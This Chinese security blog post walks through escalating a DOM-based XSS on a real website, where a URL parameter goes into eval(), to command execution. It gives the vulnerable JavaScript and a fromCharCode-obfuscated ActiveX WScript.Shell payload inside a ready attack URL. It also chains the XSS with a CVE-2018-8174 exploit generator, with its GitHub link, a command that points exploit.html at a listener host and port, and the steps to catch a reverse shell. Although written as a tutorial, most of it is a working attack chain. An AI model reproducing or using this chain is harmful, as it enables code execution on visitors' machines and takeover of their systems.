记一次从DOM型XSS到RCE过程
mosin 渗透测试 16838浏览 · 2019-01-25 01:40

0x00 前言

好久没有写文章,都2019年了,哎~.
今天我们来讨论下XSS漏洞利用危害的提升,不是什么新技术,以前的前端木马就是这么干的。传统的XSS利用大多数都是抓个Cookies或者结合CSRF等进行组合拳利用。XSS漏洞因为其受到浏览器的限制,很多的功能被安全策略阻挡无法利用,当然绕过浏览器的安全策略也是有的,但是这个不在本文的讨论范围之内(因为不是很容易),有兴趣的朋友可以去找找这方面的知识看看。
本文只是以DOM型XSS为引子,其他类型XSS的利用同理。

0x01 DOM XSS漏洞挖掘

这个地方以网上的一个站点为例子。
DOM型XSS的寻找和一般的XSS寻找差不多,都是寻找输入输出,所以不是很难。
首先打开主页会调用index.js文件,然后对提交过来的参数进行接收,参数为platform,随后参数被传入eval()函数,我们跟进getParam()函数

GetParam()函数对提交过来的url进行分割,提取参数platform的值,这个地方并没有任何的过滤,所以我们的参数值是完整的被返回过来的。这里就造成了代码执行。

// 用正则表达式获取地址栏参数
function getParam(paramName) {
    paramValue = "", isFound = !1;
    if (this.location.search.indexOf("?") == 0 && this.location.search.indexOf("=") > 1) {
        arrSource = unescape(this.location.search).substring(1, this.location.search.length).split("&"), i = 0;
        while (i < arrSource.length && !isFound) arrSource[i].indexOf("=") > 0 && arrSource[i].split("=")[0].toLowerCase() == paramName.toLowerCase() && (paramValue = arrSource[i].split("=")[1], isFound = !0), i++
    }
    return paramValue == "" && (paramValue = null), paramValue
}

0x02 漏洞调试演示

首先下断点在接收参数那个地方,输入http://xxx.xxx.xxx.xxx/?platform=alert(“xss”)这个payload ,在浏览器上打开,断点执行到此处

在执行完getParam()函数的时候,返回的是我们提交完整的值

可以看到这个代码值完全被带入eval()函数并执行了。

执行效果

0x03 RCE执行

为了让XSS的危害提升,我们利用javascript来执行系统命令。

我们构造javascript代码,来执行系统命令。

var o = new ActiveXObject("WScript.Shell");
o.run(“calc.exe”);

为了美观,我们对代码进行加密,加密后代码如下

String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,115,104,101,108,108,39,41,59,10,111,46,114,117,110,40,39,99,97,108,99,46,101,120,101,39,41,59,10)

在浏览器上打开该URL链接,我们可以看到浏览器报错了,这个是因为浏览器的安全机制默认禁止使用activex控件,所以不是弹个大大的警告框就是禁止执行这种(不过如果是我们滥用被信任的activex控件时,浏览器是不会进行拦截的)。

http://xxx.xx.xxx.xxx/?platform=eval(String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,115,104,101,108,108,39,41,59,10,111,46,114,117,110,40,39,99,97,108,99,46,101,120,101,39,41,59,10));


在IE上打开Internet Explorer “工具”菜单栏中的“选项”-“安全”-“自定义级别”-“对没有标记为安全的activex控件进行初始化和脚本运行-设置成启用,如下

再次打开上文的url,这次成功执行

0x04 XSS组合利用

上文中提到的方法在一般情况下都不会成功,首先浏览器那一关就过不了,在执行时都会弹出一个大大的警告。所以呢,为了让XSS攻击达到高危化,我们可以引入浏览器漏洞,这里以CVE-2018-8174漏洞为例子。

EXP下载地址:https://github.com/Yt1g3r/CVE-2018-8174_EXP
然后一顿如下操作

1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -i 2.2.2.2 -p 4444
2. 上传exploit.html到自己的服务器上面去
3. 本地服务器或其他主机进行端口监听

然后打开DOM XSS攻击链接,如下

我们在服务器上监听的端口成功得到反弹shell

0x05 总结

总的来说XSS通过浏览器执行系统命令是可行的,但是因为或多或少的外部因素,导致命令执行并不成功,一方面是浏览器的安全限制,另一方面是系统的安全保护机制,所以只要绕过了浏览器的安全限制(并不容易),那么通过XSS静默执行系统命令就不在话下了。

3 条评论
某人
表情
可输入 255